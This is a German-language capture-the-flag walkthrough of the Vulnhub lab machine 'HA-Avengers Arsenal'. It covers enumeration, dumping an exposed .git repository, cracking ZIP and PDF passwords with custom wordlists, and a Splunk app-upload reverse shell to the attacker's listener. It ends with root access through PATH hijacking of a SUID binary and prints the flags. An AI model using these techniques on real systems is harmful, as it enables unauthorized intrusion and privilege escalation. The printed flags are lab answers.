HA-Avengers Arsenal - Vulnhub - Level: Medium - Bericht

Medium

Verwendete Tools

arp-scan
vi
nmap
nikto
gobuster
curl
dirb
wget
zip2john
unzip
pdf2john
john
git-dumper
git
cupp
fcrackzip
nc

Inhaltsverzeichnis

Reconnaissance

vm login: arsenal,splunk
Die Anmeldeinformationen für die VM sind "arsenal" und "splunk".
┌──(root㉿cyber)-[~]
└─# arp-scan -l
192.168.2.106 08:00:27:84:fe:04 PCS Systemtechnik GmbH
Wir verwenden ARP-Scan, um die IP-Adresse und MAC-Adresse des Zielsystems zu ermitteln. Dies hilft uns, das Zielsystem im Netzwerk zu identifizieren.
┌──(root㉿cyber)-[~]
└─# vi /etc/hosts
192.168.2.106 avengers.vln
Wir fügen die IP-Adresse und den Hostnamen des Zielsystems zur /etc/hosts-Datei hinzu. Dies ermöglicht uns, das Zielsystem über den Hostnamen anzusprechen.
┌──(root㉿cyber)-[~]
└─# nmap -sS -sV -A -T5 192.168.2.106 -p- | grep open
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
8000/tcp open http Splunkd httpd
8089/tcp open ssl/http Splunkd httpd
Wir führen einen Nmap-Scan durch, um offene Ports und Dienste zu identifizieren. Wir finden, dass Port 80 (HTTP), Port 8000 (Splunkd httpd) und Port 8089 (SSL/HTTP Splunkd httpd) offen sind.
┌──(root㉿cyber)-[~]
└─# nmap -sS -sV -A -T5 192.168.2.106 -p- 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-27 21:54 CET
Nmap scan report for avengers.vln (192.168.2.106)
Host is up (0.00013s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
80/tcp   open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Avengers Arsenal
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-git: 
|   192.168.2.106:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|     Remotes:
|_      https://github.com/Ignitetechnologies/Web-Application-Cheatsheet.git
| http-robots.txt: 1 disallowed entry 
|_/groot
8000/tcp open  http     Splunkd httpd
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Splunkd
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://avengers.vln:8000/en-US/account/login?return_to=%2Fen-US%2F
8089/tcp open  ssl/http Splunkd httpd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2019-09-16T14:51:44
|_Not valid after:  2022-09-15T14:51:44
|_http-server-header: Splunkd
|_http-title: splunkd
| http-robots.txt: 1 disallowed entry 
|_/
MAC Address: 08:00:27:84:FE:04 (Oracle VirtualBox virtual NIC)
Aggressive OS guesses: Linux 3.2 - 4.9 (97%), Linux 5.1 (95%), Netgear RAIDiator 4.2.28 (94%), Linux 2.6.32 (94%),
 Linux 4.15 - 5.8 (94%), Linux 2.6.32 - 2.6.35 (94%), Linux 2.6.32 - 3.5 (94%), Linux 2.6.32 - 3.10 (94%), 
Linux 5.0 - 5.5 (93%), Android 4.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.12 ms avengers.vln (192.168.2.106)
Wir führen einen umfassenden Nmap-Scan durch, um weitere Details zu den offenen Ports und Diensten zu erhalten. Wir finden, dass auf Port 80 ein Apache-Webserver mit dem Titel "Avengers Arsenal" läuft und ein .git-Verzeichnis vorhanden ist. Auf den Ports 8000 und 8089 läuft Splunkd httpd.
┌──(root㉿cyber)-[~]
└─# nikto -h 192.168.2.106 
- Nikto v2.5.0

+ Target IP:          192.168.2.106
+ Target Hostname:    192.168.2.106
+ Target Port:        80
+ Start Time:         2024-01-27 21:54:44 (GMT+0100)

+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. 
   See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /groot/: Directory indexing found.
+ /robots.txt: Entry '/groot/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: contains 1 entry which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ RFC-1918 /images: IP address found in the 'location' header. The IP is "fe8085fc:dd78:ca98:6989". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed
+ /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "fe8085fc:dd78:ca98:6989". 
   See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649
+ /: Server may leak inodes via ETags, header found with file /, inode: 1bfd, size: 592cf9f3e8286, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /css/: Directory indexing found.
+ /css/: This might be interesting.
+ /images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /.git/index: Git Index file may contain directory listing information.
+ /.git/HEAD: Git HEAD file found. Full repo details may be present.
+ /.git/config: Git config file found. Infos about repo details may be present.
+ 8103 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time:           2024-01-27 21:54:58 (GMT+0100) (14 seconds)

+ 1 host(s) tested
Wir verwenden Nikto, um den Webserver auf Sicherheitslücken zu scannen. Wir stellen fest, dass wichtige Sicherheitsheader fehlen, Directory Indexing aktiviert ist, ein robots.txt vorhanden ist und ein .git-Verzeichnis gefunden wurde.
┌──(root㉿cyber)-[~]
└─# gobuster dir -u http://avengers.vln -x txt,php,rar,zip,tar,pub,xls,docx,doc,sql,db,mdb,asp,aspx,accdb,bat,ps1,exe,..... 
http://avengers.vln/index.html           (Status: 200) [Size: 7165]
http://avengers.vln/images               (Status: 301) [Size: 313] [--> http://avengers.vln/images/]
http://avengers.vln/css                  (Status: 301) [Size: 310] [--> http://avengers.vln/css/]
http://avengers.vln/robots.txt           (Status: 200) [Size: 31]
http://avengers.vln/spammimic            (Status: 301) [Size: 316] [--> http://avengers.vln/spammimic/]
Progress: 8381204 / 8381242 (100.00%)
Wir verwenden Gobuster, um nach versteckten Dateien und Verzeichnissen auf dem Webserver zu suchen. Wir finden "index.html", "images", "css", "robots.txt" und "spammimic".
┌──(root㉿cyber)-[~]
└─# curl http://192.168.2.106:80/.git/
Wir versuchen, auf das .git-Verzeichnis zuzugreifen.
┌──(root㉿cyber)-[~]
└─# dirb http://192.168.2.106 
> DIRECTORY: http://192.168.2.106/images/                                                  
+ http://192.168.2.106/.git/HEAD (CODE:200|SIZE:23)                                          
> DIRECTORY: http://192.168.2.106/css/                                                     
+ http://192.168.2.106/index.html (CODE:200|SIZE:7165)                                       
+ http://192.168.2.106/robots.txt (CODE:200|SIZE:31)
Wir verwenden DIRB, um nach Dateien und Verzeichnissen zu suchen. Wir finden das .git-Verzeichnis und andere bekannte Dateien.
------------------------------------------------------------------------------------
http://192.168.2.106/.git/HEAD
ref: refs/heads/master 
[core]
	repositoryformatversion = 0
	filemode = true
	bare = false
	logallrefupdates = true
[remote "origin"]
	url = https://github.com/Ignitetechnologies/Web-Application-Cheatsheet.git
	fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
	remote = origin
	merge = refs/heads/master

0000000000000000000000000000000000000000 6820ee28fb8a3af055bbd9cafa4a707f8cb4392f 
root  1568707264 -0700	
clone: from https://github.com/Ignitetechnologies/Web-Application-Cheatsheet.git
go there :https://github.com/Hackingzone/hackingarticles.git
Wir lesen die Datei ".git/HEAD", um den aktuellen Branch zu ermitteln. Wir lesen die Konfigurationsdatei, um die Remote-Repository-URL zu ermitteln. Wir sehen auch einen Hinweis auf ein anderes Repository.
------------------------------------------------------------------------------------
http://192.168.2.106/robots.txt
User-agent: *
Disallow: /groot
Wir lesen die Datei "robots.txt" und finden einen Eintrag, der das Verzeichnis "/groot" ausschließt.
------------------------------------------------------------------------------------
http://192.168.2.106/groot/ 
Index of /groot

[IC]	Name	Last modified	Size	Description

[PARENTDIR]	Parent Directory	 	- 	 
[ ]	hammer.zip	2019-09-17 02:17 	191K	 

Apache/2.4.29 (Ubuntu) Server at 192.168.2.106 Port 80
Wir greifen auf das Verzeichnis "/groot" zu und finden die Datei "hammer.zip".
┌──(root㉿cyber)-[~]
└─# wget http://192.168.2.106/groot/hammer.zip 
--2024-01-27 23:42:31--  http://192.168.2.106/groot/hammer.zip
Verbindungsaufbau zu 192.168.2.106:80 … verbunden.
HTTP-Anforderung gesendet, auf Antwort wird gewartet … 200 OK
Länge: 195979 (191K) [application/zip]
Wird in hammer.zip gespeichert.

hammer.zip              100%[=======================================>] 191,39K  --.-KB/s    in 0,001s  

2024-01-27 23:42:31 (318 MB/s) - hammer.zip gespeichert [195979/195979]
Wir laden die Datei "hammer.zip" herunter.
┌──(root㉿cyber)-[~]
└─# zip2john hammer.zip > hash
ver 2.0 efh 5455 efh 7875 hammer.zip/mjlonir.pdf PKZIP Encr: TS_chk, cmplen=195791, decmplen=197031, crc=D414E46C ts=1A76 cs=1a76 type=8
hammer.zip/mjlonir.pdf:$pkzip$1*1*2*0*2fccf*301a7*d414e46c*0*45*8*2fccf*1a76*8ac2a9e2cc7dcab6f27d56aec70f59f4d5a051fd77781d73115f78926b5cfeeb422f8f132dac095d3b1f59cbd6c8ebe596cddf643d0ef755ae00f034c2db745d0635448b7f61a1e4f4f4235000da5dd88657e9f499b306aeb687c3ed50a19478ee88f2be085c0510f0df7c42a95ffa7a9253d9fa46137acf1c6c341c25fd8e1b42....
Wir verwenden zip2john, um den Hash der Datei "hammer.zip" zu extrahieren.
------------------------------------------------------------------------------------
http://192.168.2.106:8089/
Fehler: Verbindung unterbrochen Die Verbindung zum Server wurde zurückgesetzt, während die Seite geladen wurde.
Wir können nicht auf die Splunk-Seite auf Port 8089 zugreifen.
┌──(root㉿cyber)-[~]
└─# wget http://avengers.vln/images/17.jpeg 
--2024-01-27 23:54:01--  http://avengers.vln/images/17.jpeg
Auflösen des Hostnamens avengers.vln (avengers.vln)… 192.168.2.106
Verbindungsaufbau zu avengers.vln (avengers.vln)|192.168.2.106|:80 … verbunden.
HTTP-Anforderung gesendet, auf Antwort wird gewartet … 200 OK
Länge: 21147 (21K) [image/jpeg]
Wird in 17.jpeg gespeichert.

17.jpeg                 100%[=======================================>]  20,65K  --.-KB/s    in 0s      

2024-01-27 23:54:01 (1,17 GB/s) - 17.jpeg gespeichert [21147/21147]
Wir laden die Datei "17.jpeg" herunter.
------------------------------------------------------------------------------------
https://qrcoderaptor.com/
spammimic
Wir analysieren den Hinweis, dass wir die Bilddatei herunterladen und dann spammimic verwenden sollen.
┌──(root㉿cyber)-[~]
└─# unzip hammer.zip
Archive: hammer.zip
[hammer.zip] mjlonir.pdf password: spammimic
password incorrect--reenter:
Wir versuchen, die Datei "hammer.zip" mit dem Passwort "spammimic" zu entpacken, aber es schlägt fehl.
Welcome, Welcome1, Password123
Wir versuchen es mit anderen möglichen Passwörtern.
...
┌──(root㉿cyber)-[~/Hackingtools/git-dumper]
└─# git-dumper http://192.168.2.106:80/.git/ ~/avengers 
[-] Testing http://192.168.2.106:80/.git/HEAD [200]
[-] Testing http://192.168.2.106:80/.git/ [200]
[-] Fetching .git recursively
.....
.......
Wir verwenden git-dumper, um das .git-Verzeichnis herunterzuladen.
┌──(root㉿cyber)-[~/avengers]
└─# cat README.md 
# Web Application Cheatsheet (Vulnhub)

This cheatsheet is aimed at the CTF Players and Beginners to help them understand Web Application Vulnerablity with examples. 
There are multiple ways to perform the same tasks. We have performed and compiled this list on our experience. Please share 
this with your connections and direct queries and feedback to [Pavandeep Singh](https://www.linkedin.com/in/pavan2318).

[1.1]: http://i.imgur.com/tXSoThF.png
[1]: http://www.twitter.com/rajchandel
# Follow us on http://i.imgur.com/tXSoThF.png" alt text"" alt="alt text"[1]

 img src="https://i.ibb.co/xfPQjzq/vulnhub-web-app.jpg" 

Table of Contents
------------------------------------------------------------------------------------

* [Drupal](#drupal)
* [Jenkins](#jenkins)
* [Joomla](#joomla)
* [WebMin](#webmin)
* [Wordpress](#wordpress)
* [Builder Engine](#builder)
* [CMS Made Simple](#cmsms)
* [CouchDB](#couch)
* [Cuppa](#cuppa)
* [Cute News 2.0.3](#cute)
* [Impress](#impress)
* [LibreNMS](#librenms)
* [Moodle](#moodle)
* [Php Mailer](#phpmailer)
* [Playsms](#playsms)
* [Rips](#rips)
* [SPHP Blog](#sphp)
* [Squirrel Mail](#squirrel)
* [PHPText](#phptext)
* [Wolf](#wolf)
* [Zenphoto](#zen)
* [Redis](#redis)
* [Nano CMS](#nano)
Wir lesen die Datei "README.md", um Informationen über das Repository zu erhalten. Wir finden eine Liste von Webanwendungen.
┌──(root㉿cyber)-[~/avengers/.git]
└─# ls -la 
insgesamt 48
drwxr-xr-x  7 root root 4096 28. Jan 00:03 .
drwxr-xr-x  3 root root 4096 28. Jan 00:03 ..
-rw-r--r--  1 root root  293 28. Jan 00:03 config
-rw-r--r--  1 root root   73 28. Jan 00:03 description
-rw-r--r--  1 root root   23 28. Jan 00:03 HEAD
drwxr-xr-x  2 root root 4096 28. Jan 00:03 hooks
-rw-r--r--  1 root root  137 28. Jan 00:03 index
drwxr-xr-x  2 root root 4096 28. Jan 00:03 info
drwxr-xr-x  3 root root 4096 28. Jan 00:03 logs
drwxr-xr-x 33 root root 4096 28. Jan 00:03 objects
-rw-r--r--  1 root root  114 28. Jan 00:03 packed-refs
drwxr-xr-x  4 root root 4096 28. Jan 00:03 refs
Wir listen den Inhalt des .git-Verzeichnisses auf.
┌──(root㉿cyber)-[~/avengers/.git]
└─# cat config 
[core]
	repositoryformatversion = 0
	filemode = true
	bare = false
	logallrefupdates = true
[remote "origin"]
	url = https://github.com/Ignitetechnologies/Web-Application-Cheatsheet.git
	fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
	remote = origin
	merge = refs/heads/master
Wir lesen die Konfigurationsdatei des Git-Repositorys.
┌──(root㉿cyber)-[~]
└─# git clone https://github.com/Hackingzone/hackingarticles.git 
Klone nach 'hackingarticles'...
remote: Enumerating objects: 30, done.
remote: Total 30 (delta 0), reused 0 (delta 0), pack-reused 30
Empfange Objekte: 100% (30/30), 8.38 KiB | 8.38 MiB/s, fertig.
Löse Unterschiede auf: 100% (7/7), fertig.
Wir klonen das in der .git/config erwähnte Git-Repository.
┌──(root㉿cyber)-[~/hackingarticles]
└─# git log 
commit 8de2234e98b50c97e0355ec98ff9e7051d4c796e (HEAD -> master, origin/master, origin/HEAD)
Author: Hackingzone 
Date:   Tue Sep 17 14:28:44 2019 +0530

    mew mew

commit c78e3ddf70b748d1aea5ccaf1fedc3aaab4ac451
Author: Hackingzone 
Date:   Tue Sep 17 14:28:12 2019 +0530

    IW

commit a6b610652780fb3979ee9cbd8600e93b6b740700
Author: Hackingzone 
Date:   Tue Sep 17 14:27:43 2019 +0530

    end

commit 674dc193bcdf5df2db43da89132f6efe08f3b1e8
Author: Hackingzone 
Date:   Tue Sep 17 14:27:16 2019 +0530

    avnge

commit 9b5d48af1ef4d5123544cf3007a2363346e7dd4a
Author: Hackingzone 
Date:   Tue Sep 17 14:26:29 2019 +0530

    chitauri army
Wir zeigen das Git-Log, um die Commits zu sehen.
------------------------------------------------------------------------------------ q + enter um aus git log raus zu kommen ------------------------------------------------------------------------------------
┌──(root㉿cyber)-[~/hackingarticles]
└─# git show 4fb65717a4bdfa8169fb0642abf0f355f7eea048 
commit 4fb65717a4bdfa8169fb0642abf0f355f7eea048
Author: Hackingzone 
Date:   Tue Sep 17 14:04:45 2019 +0530

    Captain America

diff --git a/CA.txt b/CA.txt
new file mode 100644
index 0000000..3fcec0d
--- /dev/null
+++ b/CA.txt
@@ -0,0 +1,5 @@
+Captain America's shield is his primary weapon. The most well-known of his shields is 
+a disc-shaped object with a five-pointed star design in its center, within blue, red, 
+and white concentric circles. This shield is composed of a unique Vibranium, 
+Proto-Adamantium alloy, and an unknown third component.
+Q2FwdGFpbiBBbWVyaWNhJ3MgU2hpZWxknswNjE3DZEUE4QkI4UEyRkU3NDVERDI2RkUyRTEzQ30=
\ No newline at end of file
Wir verwenden git show, um den Inhalt des Commits anzuzeigen. Wir finden eine Base64-verschlüsselte Zeichenkette.
------------------------------------------------------------------------------------
https://www.base64decode.org/
Q2FwdGFpbiBBbWVyaWNhJ3MgU2hpZWxknswNjE3DZEUE4QkI4UEyRkU3NDVERDI2RkUyRTEzQ30=
Captain America's Shield:{061786D9A8BB89A2FE745DD26FE2E13C}
Wir dekodieren die Base64-Zeichenkette und erhalten einen MD5-Hash.
------------------------------------------------------------------------------------
https://crackstation.net/
Hash Type Result
061786D9A8BB89A2FE745DD26FE2E13C md5 geet
Wir verwenden CrackStation, um den MD5-Hash zu knacken. Wir finden das Passwort "geet".
------------------------------------------------------------------------------------
https://www.spammimic.com/decodespace.cgi
Scepter:{469F1394A349DCF8A742653CE093FA80}
Wir versuchen, die Zeichenkette mit spammimic zu dekodieren. Wir finden einen MD5-Hash.
------------------------------------------------------------------------------------
https://crackstation.net/
Hash Type Result
469F1394A349DCF8A742653CE093FA80 md5 aarav
Wir verwenden CrackStation, um den MD5-Hash zu knacken. Wir finden das Passwort "aarav".
┌──(root㉿cyber)-[~]
└─# cupp -i 
 ___________ 
   cupp.py!                 # Common
      \                     # User
       \   ,__,             # Passwords
        \  (oo)____         # Profiler
           (__)    )\   
              ||--|| *      [ Muris Kurgas | j0rgan@remote-exploit.org ]
                            [ Mebus | https://github.com/Mebus/]


[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)

> First Name: tony
> Surname: stark
> Nickname: ironman
> Birthdate (DDMMYYYY): 01052008


> Partners) name: 
> Partners) nickname: 
> Partners) birthdate (DDMMYYYY): 


> Child's name: 
> Child's nickname: 
> Child's birthdate (DDMMYYYY): 


> Pet's name: 
> Company name: 


> Do you want to add some key words about the victim? Y/[N]: y
> Please enter the words, separated by comma. [i.e. hacker,juice,black], spaces will be removed: y
> Do you want to add special chars at the end of words? Y/[N]: n
> Do you want to add some random numbers at the end of words? Y/[N]:n
> Leet mode? (i.e. leet = 1337) Y/[N]: n

[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to tony.txt, counting 3610 words.
[+] Now load your pistolero with tony.txt and shoot! Good luck!
Wir verwenden CUpp, um eine benutzerdefinierte Wortliste basierend auf Informationen über "tony stark" zu erstellen.
------------------------------------------------------------------------------------
┌──(root㉿cyber)-[~]
└─# fcrackzip -D -u -v -p tony.txt hammer.zip
found file 'mjlonir.pdf', (size cp/uc 195791/197031, flags 9, chk 1a76)

PASSWRD FOUND!!!!: pw Stark12008
Wir verwenden fcrackzip, um das Passwort der Datei "hammer.zip" mit der benutzerdefinierten Wortliste "tony.txt" zu knacken. Wir finden das Passwort Stark12008.
------------------------------------------------------------------------------------
┌──(root㉿cyber)-[~]
└─# unzip hammer.zip
Archive: hammer.zip
Enter password: Stark12008
┌──(root㉿cyber)-[~]
└─# ll
-rw-r--r-- 1 root root 197031 17. Sep 2019 mjlonir.pdf
Wir entpacken die Datei "hammer.zip" mit dem gefundenen Passwort und finden die Datei "mjlonir.pdf".
┌──(root㉿cyber)-[/home/cyber/Downloads]
└─# pdf2john mjlonir.pdf > hash
Wir verwenden pdf2john, um den Hash der PDF-Datei zu extrahieren.
┌──(root㉿cyber)-[/home/cyber/Downloads]
└─# john --wordlist=~/tony.txt hash 
Using default input encoding: UTF-8
Loaded 1 password hash (PDF [MD5 SHA2 RC4/AES 32/64])
Cost 1 (revision) is 4 for all loaded hashes
Will run 16 penMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
------------------------------------------------------------------------------------
Tony_050081      (mjlonir.pdf)     
------------------------------------------------------------------------------------
1g 0:00:00:00 DNE (2024-01-28 00:36) 100.0g/s 102400p/s 102400c/s 102400C/s Stark_5..Y0501008
Use the "--show --format=PDF" options to display all of the cracked passwords reliably
Session completed.
Wir verwenden John the Ripper, um das Passwort der PDF-Datei mit der benutzerdefinierten Wortliste zu knacken. Wir finden das Passwort "Tony_050081".
------------------------------------------------------------------------------------ file:///home/cyber/Downloads/mjlonir.pdf Mjølnir:{4A3232C59ECDA21AC71BEBE3B329BF36}
Wir finden einen MD5-Hash.
------------------------------------------------------------------------------------
https://crackstation.net/
Hash Type Result
4A3232C59ECDA21AC71BEBE3B329BF36 md5 shreya
Wir verwenden CrackStation, um den MD5-Hash zu knacken. Wir finden das Passwort "shreya".
------------------------------------------------------------------------------------ view-source:http://avengers.vln/
Yaka Arrow Section --> Wielded by Yondu
The Yaka Arrow is a whistle-controlled arrow made from Yaka that uses technology
native to the Centaurian people.

The Yaka Arrow was Yondu Udonta's favored weapon. Highly skilled in its usage,
Udonta always kept one in a holster by his side.
href="ravagers.html"
Wir analysieren den Quellcode der Webseite und finden einen Hinweis auf "ravagers.html".
view-source:http://avengers.vln/ravagers.html
61 67 65 6e 74 3a 61 76 65 6e 67 65 72 73
Wir analysieren den Quellcode der Seite "ravagers.html" und finden eine Hexadezimalkodierung.
------------------------------------------------------------------------------------
https://gchq.github.io/CyberChef/#recipe=From_Hex('Space')
agent:avengers
Wir verwenden CyberChef, um die Hexadezimalkodierung zu dekodieren. Wir erhalten "agent:avengers".
------------------------------------------------------------------------------------
https://gchq.github.io/CyberChef/#recipe=From_Hex('Space')&input=NjEgNjcgNjUgNmUgNzQgM2EgNjEgNzYgNjUgNmUgNjcgNjUgNzIgNzM
agent:avengers
Wir verwenden CyberChef erneut, um eine andere Hexadezimalkodierung zu dekodieren. Wir erhalten "agent:avengers".
------------------------------------------------------------------------------------ http://192.168.2.106:8000/de-DE/app/launcher/home agent:avengers
Wir versuchen, uns mit den Anmeldeinformationen "agent:avengers" bei Splunk anzumelden.
┌──(root㉿cyber)-[/home/cyber/Downloads]
└─# wget https://github.com/TBGSecurity/splunk_shells/archive/1.2.tar.gz 
--2024-01-28 00:59:42--  https://github.com/TBGSecurity/splunk_shells/archive/1.2.tar.gz
Auflösen des Hostnamens github.com (github.com)… 140.82.121.4
Verbindungsaufbau zu github.com (github.com)|140.82.121.4|:443 … verbunden.
HTTP-Anforderung gesendet, auf Antwort wird gewartet … 302 Found
Platz: https://codeload.github.com/TBGSecurity/splunk_shells/tar.gz/refs/tags/1.2 [folgend]
--2024-01-28 00:59:42--  https://codeload.github.com/TBGSecurity/splunk_shells/tar.gz/refs/tags/1.2
Auflösen des Hostnamens codeload.github.com (codeload.github.com)… 140.82.121.10
Verbindungsaufbau zu codeload.github.com (codeload.github.com)|140.82.121.10|:443 … verbunden.
HTTP-Anforderung gesendet, auf Antwort wird gewartet … 200 OK
Länge: nicht spezifiziert [application/x-gzip]
Wird in 1.2.tar.gz gespeichert.

1.2.tar.gz                  [ <=>                          ] 418,78K  --.-KB/s    in 0,09s   

2024-01-28 00:59:43 (4,52 MB/s) - 1.2.tar.gz gespeichert [428832]
Wir laden das splunk_shells-Tool herunter.
------------------------------------------------------------------------------------
http://192.168.2.106:8000/de-DE/manager/appinstall/_upload?breadcrumbs=Einstellungen%7C%2Fmanager%2Fsearch%2F%09Apps%7C%2Fmanager%2Fsearch%2Fapps%2Flocal
Navigation überspringen > Apps
Administrator
6Nachrichten
Einstellungen
Aktivität
Hilfe
App hochladen
Apps App hochladen
Hochladen einer App
Wenn Ihnen eine App-Datei mit der Erweiterung '.spl' oder '.tar.gz' vorliegt, die Sie installieren möchten, dann können Sie diese unter Verwendung dieses Formulars hochladen.

Sie können eine vorhandene App über die Splunk-Befehlszeile ersetzen. Erfahren Sie mehr.
Datei
App-Upgrade. Bei Auswahl dieser Option wird die App überschrieben, falls sie bereits vorhanden ist.
Abbrechen
Wir navigieren zur Splunk-App-Upload-Seite.
┌──(root㉿cyber)-[/home/cyber/Downloads]
└─# tar zxvf 1.2.tar.gz 
splunk_shells-1.2/
splunk_shells-1.2/.gitignore
splunk_shells-1.2/README.md
splunk_shells-1.2/appserver/
Wir entpacken die heruntergeladene Datei.
------------------------------------------------------------------------------------
http://192.168.2.106:8000/de-DE/manager/appinstall/_upload
Möchten Sie Splunk wirklich neu starten?
Splunk Enterprise wird neu gestartet...
Neustart läuft. Bitte warten Sie.

Neustart erfolgreich – Dieses Dialogfeld schließen, um zurück zur Anmeldeseite zu gelangen
Wir starten Splunk neu.
http://192.168.2.106:8000/de-DE/manager/search/apps/local
Apps

Angezeigt werden 1-19 von 19 Elementen
Weitere Apps durchsuchen
App aus Datei installieren
App erstellen
... .. ...
Berechtigungen

Ausgewählte Rollenberechtigungen anwenden auf:
Erfahren Sie mehr
Nur diese App (splunk_shells-1.2) ()Alle Apps (System)
Wir navigieren zu den lokalen Splunk-Apps.
┌──(root㉿cyber)-[/home/cyber/Downloads]
└─# nc -lvnp 1234
listening on [any] 1234 ...
Wir starten Netcat im Listenmodus auf Port 1234.
http://192.168.2.106:8000/de-DE/app/search/search
| revshell std 192.168.2.199 1234
Wir verwenden die "revshell"-Funktion von splunk_shells, um eine Reverse-Shell zu erstellen.
┌──(root㉿cyber)-[/home/cyber/Downloads]
└─# nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.2.199] from (UNKNWN) [192.168.2.106] 46944
Wir erhalten eine Reverse-Shell.

Privilege Escalation

Privilege Escalation
┌──(root㉿cyber)-[~]
└─# nc -lvnp 5554
listening on [any] 5554 ...
connect to [192.168.2.199] from (UNKNWN) [192.168.2.106] 48996
id
uid=1001(splunk) gid=1001(splunk) groups=1001(splunk)
Wir überprüfen die aktuelle Benutzer-ID und stellen fest, dass wir als Benutzer "splunk" angemeldet sind.
find / -type f -perm -4000 -ls 2>/dev/null 
   136171     12 -rwsr-xr-x   1 root     root        10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
   141341     12 -rwsr-sr-x   1 root     root        10232 Nov 27  2018 /usr/lib/xorg/Xorg.wrap
   134800     16 -rwsr-xr-x   1 root     root        14328 Jan 12  2022 /usr/lib/policykit-1/polkit-agent-helper-1
   136876    128 -rwsr-xr-x   1 root     root       130264 May 29  2023 /usr/lib/snapd/snap-confine
   135535     44 -rwsr-xr--   1 root     messagebus    42992 Oct 25  2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
   141703    428 -rwsr-xr-x   1 root     root         436552 Aug 11  2021 /usr/lib/openssh/ssh-keysign
   141423    372 -rwsr-xr--   1 root     dip          378600 Jul 23  2020 /usr/sbin/pppd
   138229     60 -rwsr-xr-x   1 root     root          59640 Nov 29  2022 /usr/bin/passwd
   134929     76 -rwsr-xr-x   1 root     root          76496 Nov 29  2022 /usr/bin/chfn
   134794     24 -rwsr-xr-x   1 root     root          22520 Jan 12  2022 /usr/bin/pkexec
   135002     20 -rwsr-xr-x   1 root     root          18448 Mar  9  2017 /usr/bin/traceroute6.iputils
   134932     76 -rwsr-xr-x   1 root     root          75824 Nov 29  2022 /usr/bin/gpasswd
   141697     40 -rwsr-xr-x   1 root     root          40344 Nov 29  2022 /usr/bin/newgrp
   133742     24 -rwsr-xr-x   1 root     root          22528 Mar  9  2017 /usr/bin/arping
   134930     44 -rwsr-xr-x   1 root     root          44528 Nov 29  2022 /usr/bin/chsh
   132510     12 -rwsr-xr-x   1 root     root          10312 Aug 16  2022 /usr/bin/vmware-user-suid-wrapper
   135043    148 -rwsr-xr-x   1 root     root         149080 Apr  4  2023 /usr/bin/sudo
  1186271     12 -rwsr-xr-x   1 root     root                8392 Sep 17  2019 /opt/ignite
Wir suchen nach SUID-Dateien, die potenziell zur Privilege Escalation ausgenutzt werden können.
/opt/ignite
enp0s17: flags=4163 mtu 1500
inet 192.168.2.106 netmask 255.255.255.0 broadcast 192.168.2.255
inet6 2003:d4:c707:2277:1aa:aa49:a898:dd98 prefixlen 64 scopeid 0x0
inet6 2003:d4:c707:2277:b2a3:31e2:b1fd:4667 prefixlen 64 scopeid 0x0
inet6 fe8085fc:dd78:ca98:6989 prefixlen 64 scopeid 0x20
ether 08:00:27:84:fe:04 txqueuelen 1000 (Ethernet)
RX packets 9458196 bytes 2223552373 (2.2 GB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 9092193 bytes 4287361618 (4.2 GB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73 mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10
loop txqueuelen 1000 (Local Loopback)
RX packets 49796 bytes 45894210 (45.8 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 49796 bytes 45894210 (45.8 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
echo "/bin/bash" > /tmp/ifconfig
chmod 777 /tmp/ifconfig
export PATH=/tmp:$PATH
/opt/ignite
id
root
/opt/ignite führt die Datei "/bin/bash" aus, wodurch wir Root-Rechte erhalten. Fantastisch der root zugriff war erfolgreit nun haben wie unser Ziel erreicht!

Flags

cat root.txt
5C42D6BB0EE9CE4CB7E7349652C45C4A
cat user.txt
c7d0a8de1e03b25a6f7ed2d91b94dad6